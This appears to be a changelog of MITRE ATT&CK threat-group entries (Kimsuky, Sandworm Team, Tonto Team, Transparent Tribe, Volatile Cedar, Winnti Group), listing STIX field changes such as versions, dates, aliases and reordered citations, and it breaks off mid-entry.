x_mitre_version2.02.1

[G0094] Kimsuky

Current version: 3.1

Version changed from: 3.0 → 3.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Taewoo Lee, KISA', 'Dongwook Kim, KISA']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 22:35:20.109000+00:002022-05-24 16:28:34.698000+00:00
external_references[1]['source_name']KimsukyThallium
external_references[1]['description'](Citation: Securelist Kimsuky Sept 2013)(Citation: Malwarebytes Kimsuky June 2021)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)
external_references[2]['source_name']STOLEN PENCILBlack Banshee
external_references[2]['description'](Citation: Netscout Stolen Pencil Dec 2018)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)
external_references[3]['source_name']ThalliumSTOLEN PENCIL
external_references[3]['description'](Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: Netscout Stolen Pencil Dec 2018)
external_references[4]['source_name']Black BansheeKimsuky
external_references[4]['description'](Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: Securelist Kimsuky Sept 2013)(Citation: Malwarebytes Kimsuky June 2021)
external_references[6]['source_name']EST Kimsuky April 2019AhnLab Kimsuky Kabar Cobra Feb 2019
external_references[6]['description']Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019.AhnLab. (2019, February 28). Operation Kabar Cobra - Tenacious cyber-espionage campaign by Kimsuky Group. Retrieved September 29, 2021.
external_references[6]['url']https://blog.alyac.co.kr/2234https://global.ahnlab.com/global/upload/download/techreport/[Analysis_Report]Operation%20Kabar%20Cobra.pdf
external_references[7]['source_name']BRI Kimsuky April 2019EST Kimsuky April 2019
external_references[7]['description']BRI. (2019, April). Kimsuky unveils APT campaign 'Smoke Screen' aimed at Korea and America. Retrieved October 7, 2019.Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019.
external_references[7]['url']https://brica.de/alerts/alert/public/1255063/kimsuky-unveils-apt-campaign-smoke-screen-aimed-at-korea-and-america/https://blog.alyac.co.kr/2234
external_references[8]['source_name']Cybereason Kimsuky November 2020Netscout Stolen Pencil Dec 2018
external_references[8]['description']Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020.ASERT team. (2018, December 5). STOLEN PENCIL Campaign Targets Academia. Retrieved February 5, 2019.
external_references[8]['url']https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suitehttps://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/
external_references[9]['source_name']Malwarebytes Kimsuky June 2021BRI Kimsuky April 2019
external_references[9]['description']Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021.BRI. (2019, April). Kimsuky unveils APT campaign 'Smoke Screen' aimed at Korea and America. Retrieved October 7, 2019.
external_references[9]['url']https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/https://brica.de/alerts/alert/public/1255063/kimsuky-unveils-apt-campaign-smoke-screen-aimed-at-korea-and-america/
external_references[10]['source_name']CISA AA20-301A KimsukyZdnet Kimsuky Dec 2018
external_references[10]['description']CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020.Cimpanu, C.. (2018, December 5). Cyber-espionage group uses Chrome extension to infect victims. Retrieved August 26, 2019.
external_references[10]['url']https://us-cert.cisa.gov/ncas/alerts/aa20-301ahttps://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/
external_references[11]['source_name']Netscout Stolen Pencil Dec 2018CISA AA20-301A Kimsuky
external_references[11]['description']ASERT team. (2018, December 5). STOLEN PENCIL Campaign Targets Academia. Retrieved February 5, 2019.CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020.
external_references[11]['url']https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/https://us-cert.cisa.gov/ncas/alerts/aa20-301a
external_references[12]['source_name']EST Kimsuky SmokeScreen April 2019Cybereason Kimsuky November 2020
external_references[12]['description']ESTSecurity. (2019, April 17). Analysis of the APT Campaign ‘Smoke Screen’ targeting to Korea and US 출처: https://blog.alyac.co.kr/2243 [이스트시큐리티 알약 블로그]. Retrieved September 29, 2021.Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020.
external_references[12]['url']https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdfhttps://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite
external_references[13]['source_name']AhnLab Kimsuky Kabar Cobra Feb 2019EST Kimsuky SmokeScreen April 2019
external_references[13]['description']AhnLab. (2019, February 28). Operation Kabar Cobra - Tenacious cyber-espionage campaign by Kimsuky Group. Retrieved September 29, 2021.ESTSecurity. (2019, April 17). Analysis of the APT Campaign ‘Smoke Screen’ targeting to Korea and US 출처: https://blog.alyac.co.kr/2243 [이스트시큐리티 알약 블로그]. Retrieved September 29, 2021.
external_references[13]['url']https://global.ahnlab.com/global/upload/download/techreport/[Analysis_Report]Operation%20Kabar%20Cobra.pdfhttps://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf
external_references[14]['source_name']Securelist Kimsuky Sept 2013Malwarebytes Kimsuky June 2021
external_references[14]['description']Tarakanov , D.. (2013, September 11). The “Kimsuky” Operation: A North Korean APT?. Retrieved August 13, 2019.Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021.
external_references[14]['url']https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/
external_references[15]['source_name']Zdnet Kimsuky Dec 2018Securelist Kimsuky Sept 2013
external_references[15]['description']Cimpanu, C.. (2018, December 5). Cyber-espionage group uses Chrome extension to infect victims. Retrieved August 26, 2019.Tarakanov , D.. (2013, September 11). The “Kimsuky” Operation: A North Korean APT?. Retrieved August 13, 2019.
external_references[15]['url']https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/
x_mitre_version3.03.1

[G0034] Sandworm Team

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Dragos Threat Intelligence']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack', 'mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 21:46:19.437000+00:002022-10-12 20:11:40.313000+00:00
aliases[6]VOODOO BEARVoodoo Bear
external_references[1]['source_name']Sandworm TeamVoodoo Bear
external_references[1]['description'](Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[3]['source_name']TelebotsSandworm Team
external_references[3]['description'](Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[4]['source_name']IRON VIKINGQuedagh
external_references[4]['description'](Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[6]['source_name']QuedaghTelebots
external_references[6]['description'](Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[7]['source_name']VOODOO BEARIRON VIKING
external_references[7]['description'](Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[8]['source_name']US District Court Indictment GRU Unit 74455 October 2020US District Court Indictment GRU Oct 2018
external_references[8]['description']Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.
external_references[8]['url']https://www.justice.gov/opa/press-release/file/1328521/downloadhttps://www.justice.gov/opa/page/file/1098481/download
external_references[9]['source_name']UK NCSC Olympic Attacks October 2020Dragos ELECTRUM
external_references[9]['description']UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.
external_references[9]['url']https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-gameshttps://www.dragos.com/resource/electrum/
external_references[10]['source_name']iSIGHT Sandworm 2014F-Secure BlackEnergy 2014
external_references[10]['description']Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.
external_references[10]['url']https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.htmlhttps://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf
external_references[11]['source_name']CrowdStrike VOODOO BEARiSIGHT Sandworm 2014
external_references[11]['description']Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.
external_references[11]['url']https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html
external_references[12]['source_name']USDOJ Sandworm Feb 2020CrowdStrike VOODOO BEAR
external_references[12]['description']Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.
external_references[12]['url']https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.htmlhttps://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/
external_references[13]['source_name']NCSC Sandworm Feb 2020InfoSecurity Sandworm Oct 2014
external_references[13]['description']NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.
external_references[13]['url']https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisoryhttps://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/
external_references[14]['source_name']US District Court Indictment GRU Oct 2018NCSC Sandworm Feb 2020
external_references[14]['description']Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.
external_references[14]['url']https://www.justice.gov/opa/page/file/1098481/downloadhttps://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory
external_references[15]['source_name']F-Secure BlackEnergy 2014USDOJ Sandworm Feb 2020
external_references[15]['description']F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.
external_references[15]['url']https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdfhttps://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html
external_references[16]['source_name']InfoSecurity Sandworm Oct 2014US District Court Indictment GRU Unit 74455 October 2020
external_references[16]['description']Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.
external_references[16]['url']https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/https://www.justice.gov/opa/press-release/file/1328521/download
external_references[17]['source_name']Dragos ELECTRUMSecureworks IRON VIKING
external_references[17]['description']Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.
external_references[17]['url']https://www.dragos.com/resource/electrum/https://www.secureworks.com/research/threat-profiles/iron-viking
external_references[18]['source_name']Secureworks IRON VIKING UK NCSC Olympic Attacks October 2020
external_references[18]['description']Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.
external_references[18]['url']https://www.secureworks.com/research/threat-profiles/iron-vikinghttps://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games
x_mitre_version2.12.2

[G0131] Tonto Team

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 20:56:22.161000+00:002022-01-27 17:51:41.433000+00:00
external_references[1]['source_name']Earth AkhlutTonto Team
external_references[1]['description'](Citation: TrendMicro Tonto Team October 2020)(Citation: Talos Bisonal Mar 2020)
external_references[2]['source_name']BRONZE HUNTLEYEarth Akhlut
external_references[2]['description'](Citation: Secureworks BRONZE HUNTLEY )(Citation: TrendMicro Tonto Team October 2020)
external_references[3]['source_name']CactusPeteBRONZE HUNTLEY
external_references[3]['description'](Citation: Kaspersky CactusPete Aug 2020)(Citation: Secureworks BRONZE HUNTLEY )
external_references[4]['source_name']Karma PandaCactusPete
external_references[4]['description'](Citation: Kaspersky CactusPete Aug 2020)(Citation: CrowdStrike Manufacturing Threat July 2020)(Citation: Kaspersky CactusPete Aug 2020)
external_references[5]['source_name']Kaspersky CactusPete Aug 2020Karma Panda
external_references[5]['description']Zykov, K. (2020, August 13). CactusPete APT group’s updated Bisonal backdoor. Retrieved May 5, 2021.(Citation: Kaspersky CactusPete Aug 2020)(Citation: CrowdStrike Manufacturing Threat July 2020)
external_references[6]['source_name']ESET Exchange Mar 2021Kaspersky CactusPete Aug 2020
external_references[6]['description']Faou, M., Tartare, M., Dupuy, T. (2021, March 10). Exchange servers under siege from at least 10 APT groups. Retrieved May 21, 2021.Zykov, K. (2020, August 13). CactusPete APT group’s updated Bisonal backdoor. Retrieved May 5, 2021.
external_references[6]['url']https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/
external_references[7]['source_name']FireEye Chinese Espionage October 2019ESET Exchange Mar 2021
external_references[7]['description']Nalani Fraser, Kelli Vanderlee. (2019, October 10). Achievement Unlocked - Chinese Cyber Espionage Evolves to Support Higher Level Missions. Retrieved October 17, 2021.Faou, M., Tartare, M., Dupuy, T. (2021, March 10). Exchange servers under siege from at least 10 APT groups. Retrieved May 21, 2021.
external_references[7]['url']https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdfhttps://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/
external_references[8]['source_name']ARS Technica China Hack SK April 2017FireEye Chinese Espionage October 2019
external_references[8]['description']Sean Gallagher. (2017, April 21). Researchers claim China trying to hack South Korea missile defense efforts. Retrieved October 17, 2021.Nalani Fraser, Kelli Vanderlee. (2019, October 10). Achievement Unlocked - Chinese Cyber Espionage Evolves to Support Higher Level Missions. Retrieved October 17, 2021.
external_references[8]['url']https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf
external_references[9]['source_name']Trend Micro HeartBeat Campaign January 2013ARS Technica China Hack SK April 2017
external_references[9]['description']Roland Dela Paz. (2003, January 3). The HeartBeat APT Campaign. Retrieved October 17, 2021.Sean Gallagher. (2017, April 21). Researchers claim China trying to hack South Korea missile defense efforts. Retrieved October 17, 2021.
external_references[9]['url']https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the-heartbeat-apt-campaign.pdf?https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/
external_references[10]['source_name']Talos Bisonal 10 Years March 2020Trend Micro HeartBeat Campaign January 2013
external_references[10]['description']Warren Mercer, Paul Rascagneres, Vitor Ventura. (2020, March 6). Bisonal 10 Years of Play. Retrieved October 17, 2021.Roland Dela Paz. (2003, January 3). The HeartBeat APT Campaign. Retrieved October 17, 2021.
external_references[10]['url']https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.htmlhttps://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the-heartbeat-apt-campaign.pdf?
external_references[11]['source_name']TrendMicro Tonto Team October 2020Talos Bisonal 10 Years March 2020
external_references[11]['description']Daniel Lughi, Jaromir Horejsi. (2020, October 2). Tonto Team - Exploring the TTPs of an advanced threat actor operating a large infrastructure. Retrieved October 17, 2021.Warren Mercer, Paul Rascagneres, Vitor Ventura. (2020, March 6). Bisonal 10 Years of Play. Retrieved October 17, 2021.
external_references[11]['url']https://vb2020.vblocalhost.com/uploads/VB2020-06.pdfhttps://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html
external_references[12]['source_name']Secureworks BRONZE HUNTLEY Talos Bisonal Mar 2020
external_references[12]['description']Secureworks. (2021, January 1). BRONZE HUNTLEY Threat Profile. Retrieved May 5, 2021.Mercer, W., et al. (2020, March 5). Bisonal: 10 years of play. Retrieved January 26, 2022.
external_references[12]['url']https://www.secureworks.com/research/threat-profiles/bronze-huntleyhttps://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html
external_references[13]['source_name']CrowdStrike Manufacturing Threat July 2020TrendMicro Tonto Team October 2020
external_references[13]['description']Falcon OverWatch Team. (2020, July 14). Manufacturing Industry in the Adversaries’ Crosshairs. Retrieved October 17, 2021.Daniel Lughi, Jaromir Horejsi. (2020, October 2). Tonto Team - Exploring the TTPs of an advanced threat actor operating a large infrastructure. Retrieved October 17, 2021.
external_references[13]['url']https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/https://vb2020.vblocalhost.com/uploads/VB2020-06.pdf
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Secureworks BRONZE HUNTLEY ', 'description': 'Secureworks. (2021, January 1). BRONZE HUNTLEY Threat Profile. Retrieved May 5, 2021.', 'url': 'https://www.secureworks.com/research/threat-profiles/bronze-huntley'}
external_references{'source_name': 'CrowdStrike Manufacturing Threat July 2020', 'description': 'Falcon OverWatch Team. (2020, July 14). Manufacturing Industry in the Adversaries’ Crosshairs. Retrieved October 17, 2021.', 'url': 'https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/'}

[G0134] Transparent Tribe

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-25 17:19:00.720000+00:002022-09-22 20:27:21.053000+00:00
external_references[1]['source_name']COPPER FIELDSTONEMythic Leopard
external_references[1]['description'](Citation: Secureworks COPPER FIELDSTONE Profile)(Citation: Crowdstrike Mythic Leopard Profile)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Talos Transparent Tribe May 2021)
external_references[2]['source_name']APT36COPPER FIELDSTONE
external_references[2]['description'](Citation: Talos Transparent Tribe May 2021)(Citation: Secureworks COPPER FIELDSTONE Profile)
external_references[3]['source_name']Mythic LeopardAPT36
external_references[3]['description'](Citation: Crowdstrike Mythic Leopard Profile)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Talos Transparent Tribe May 2021)(Citation: Talos Transparent Tribe May 2021)
external_references[5]['source_name']Proofpoint Operation Transparent Tribe March 2016Crowdstrike Mythic Leopard Profile
external_references[5]['description']Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.Crowdstrike. (n.d.). Mythic Leopard. Retrieved October 6, 2021.
external_references[5]['url']https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdfhttps://adversary.crowdstrike.com/en-US/adversary/mythic-leopard/
external_references[7]['source_name']Talos Transparent Tribe May 2021Unit 42 ProjectM March 2016
external_references[7]['description']Malhotra, A. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal. Retrieved September 2, 2021.Falcone, R. and Conant S. (2016, March 25). ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe. Retrieved September 2, 2021.
external_references[7]['url']https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.htmlhttps://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/
external_references[8]['source_name']Secureworks COPPER FIELDSTONE ProfileProofpoint Operation Transparent Tribe March 2016
external_references[8]['description']Secureworks. (n.d.). COPPER FIELDSTONE. Retrieved October 6, 2021.Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.
external_references[8]['url']https://www.secureworks.com/research/threat-profiles/copper-fieldstonehttps://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf
external_references[9]['source_name']Crowdstrike Mythic Leopard ProfileTalos Transparent Tribe May 2021
external_references[9]['description']Crowdstrike. (n.d.). Mythic Leopard. Retrieved October 6, 2021.Malhotra, A. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal. Retrieved September 2, 2021.
external_references[9]['url']https://adversary.crowdstrike.com/en-US/adversary/mythic-leopard/https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html
external_references[10]['source_name']Unit 42 ProjectM March 2016Secureworks COPPER FIELDSTONE Profile
external_references[10]['description']Falcone, R. and Conant S. (2016, March 25). ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe. Retrieved September 2, 2021.Secureworks. (n.d.). COPPER FIELDSTONE. Retrieved October 6, 2021.
external_references[10]['url']https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/https://www.secureworks.com/research/threat-profiles/copper-fieldstone
x_mitre_version1.01.1

[G0123] Volatile Cedar

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-02-10 21:01:16.908000+00:002022-04-20 20:08:15.870000+00:00
external_references[3]['source_name']CheckPoint Volatile Cedar March 2015ClearSky Lebanese Cedar Jan 2021
external_references[3]['description']Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021.ClearSky Cyber Security. (2021, January). “Lebanese Cedar” APT Global Lebanese Espionage Campaign Leveraging Web Servers. Retrieved February 10, 2021.
external_references[3]['url']https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdfhttps://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf
external_references[4]['source_name']ClearSky Lebanese Cedar Jan 2021CheckPoint Volatile Cedar March 2015
external_references[4]['description']ClearSky Cyber Security. (2021, January). “Lebanese Cedar” APT Global Lebanese Espionage Campaign Leveraging Web Servers. Retrieved February 10, 2021.Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021.
external_references[4]['url']https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdfhttps://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf
x_mitre_version1.01.1

[G0044] Winnti Group

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1[Winnti Group](https://attack.mitre.org/groups/G0044) is a tt1[Winnti Group](https://attack.mitre.org/groups/G0044) is a t
>hreat group with Chinese origins that has been active since >hreat group with Chinese origins that has been active since 
>at least 2010. The group has heavily targeted the gaming ind>at least 2010. The group has heavily targeted the gaming ind
>ustry, but it has also expanded the scope of its targeting. >ustry, but it has also expanded the scope of its targeting.(
>(Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky>Citation: Kaspersky Winnti April 2013)(Citation: Kaspersky W
> Winnti June 2015) (Citation: Novetta Winnti April 2015) Som>innti June 2015)(Citation: Novetta Winnti April 2015) Some r
>e reporting suggests a number of other groups, including [Ax>eporting suggests a number of other groups, including [Axiom
>iom](https://attack.mitre.org/groups/G0001), [APT17](https:/>](https://attack.mitre.org/groups/G0001), [APT17](https://at
>/attack.mitre.org/groups/G0025), and [Ke3chang](https://atta>tack.mitre.org/groups/G0025), and [Ke3chang](https://attack.
>ck.mitre.org/groups/G0004), are closely linked to [Winnti Gr>mitre.org/groups/G0004), are closely linked to [Winnti Group
>oup](https://attack.mitre.org/groups/G0044). (Citation: 401 >](https://attack.mitre.org/groups/G0044).(Citation: 401 TRG 
>TRG Winnti Umbrella May 2018)>Winnti Umbrella May 2018)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-11-05 15:59:50.451000+00:002022-04-15 16:27:20.897000+00:00
description[Winnti Group](https://attack.mitre.org/groups/G0044) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015) Some reporting suggests a number of other groups, including [Axiom](https://attack.mitre.org/groups/G0001), [APT17](https://attack.mitre.org/groups/G0025), and [Ke3chang](https://attack.mitre.org/groups/G0004), are closely linked to [Winnti Group](https://attack.mitre.org/groups/G0044). (Citation: 401 TRG Winnti Umbrella May 2018)[Winnti Group](https://attack.mitre.org/groups/G0044) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting.(Citation: Kaspersky Winnti April 2013)(Citation: Kaspersky Winnti June 2015)(Citation: Novetta Winnti April 2015) Some reporting suggests a number of other groups, including [Axiom](https://attack.mitre.org/groups/G0001), [APT17](https://attack.mitre.org/groups/G0025), and [Ke3chang](https://attack.mitre.org/groups/G0004), are closely linked to [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: 401 TRG Winnti Umbrella May 2018)
external_references[3]['source_name']Kaspersky Winnti April 2013Symantec Suckfly March 2016
external_references[3]['description']Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017.DiMaggio, J. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016.
external_references[3]['url']https://securelist.com/winnti-more-than-just-a-game/37029/http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates
external_references[4]['source_name']Kaspersky Winnti June 2015401 TRG Winnti Umbrella May 2018
